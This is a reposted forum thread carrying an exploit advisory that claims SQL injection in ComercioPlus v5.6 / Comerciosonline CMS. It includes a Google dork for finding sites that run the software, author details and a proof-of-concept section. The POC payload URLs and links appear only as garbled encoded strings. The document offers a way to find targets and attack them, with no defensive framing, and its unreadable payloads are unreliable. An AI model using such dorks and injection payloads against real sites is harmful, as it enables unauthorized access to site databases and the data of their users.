首页
社区
课程
招聘
[转帖]ComercioPlus v.5.6 SQL Injection Vulnerability
发表于: 2011-1-29 07:51 2913

[转帖]ComercioPlus v.5.6 SQL Injection Vulnerability

2011-1-29 07:51
2913
# Exploit Title: Comerciosonline CMS SQLi
# Google Dork: allintext: " Servicio ofrecido por ComerciosOnLine "
# Date: 27/01/2011
# Author: Daniel Godoy  
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: d27K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3c8W2L8r3W2F1j5%4g2W2L8Y4c8W2k6r3W2Y4K9i4c8S2L8q4)9J5k6h3y4G2L8g2)9J5k6h3q4J5
# Software Link: fa7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4G2L8h3g2J5j5$3W2G2M7$3!0F1L8r3W2F1k6g2)9J5k6h3y4G2L8g2)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4K6y4r3M7q4)9K6c8o6R3`.
# Version: All
# Tested on: Linux, Windows
  
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
Xarnuz, Truenex
   
   
   
[POC]
d2dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3t1J5j5#2)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4K6y4r3M7r3q4Y4k6g2)9K6c8s2m8H3i4K6g2X3M7s2u0G2k6s2g2U0N6r3!0K6i4K6u0W2M7r3S2H3i4K6t1$3N6r3W2H3L8#2)9K6c8o6q4Q4x3U0k6U0L8$3c8X3i4K6y4p5i4K6u0V1x3g2)9J5b7W2g2z5d9f1!0z5i4K6u0n7f1@1g2x3c8f1y4f1i4K6u0n7x3g2)9J5b7K6u0Q4x3V1x3K6i4K6u0o6y4q4)9J5b7K6g2Q4x3X3c8Q4x3X3b7`.
   
42eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3t1J5j5#2)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4K6y4r3M7r3q4Y4k6g2)9K6c8s2m8H3i4K6g2X3M7s2u0G2k6s2g2U0N6r3!0K6i4K6u0W2M7r3S2H3i4K6t1$3N6r3W2H3L8#2)9K6c8o6q4Q4x3U0k6U0L8$3c8X3i4K6y4p5i4K6u0V1x3g2)9J5b7W2g2z5d9f1!0z5i4K6u0n7f1@1g2x3c8f1y4f1i4K6u0n7x3g2)9J5b7K6u0Q4x3V1x3K6i4K6u0o6y4q4)9J5b7$3y4G2L8X3y4S2N6q4)9#2k6Y4N6K6i4K6t1^5x3s2R3K6j5g2)9J5b7$3y4G2k6r3W2Y4L8%4g2K6N6h3q4J5K9h3!0Q4x3V1y4W2L8h3q4A6L8q4)9J5b7%4m8S2M7%4y4%4L8%4u0V1i4K6t1&6i4K6u0n7k6Y4u0G2L8g2)9J5b7Y4m8Z5i4K6g2X3N6i4y4#2j5i4u0A6L8%4y4Q4x3X3c8Q4x3X3b7`.

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回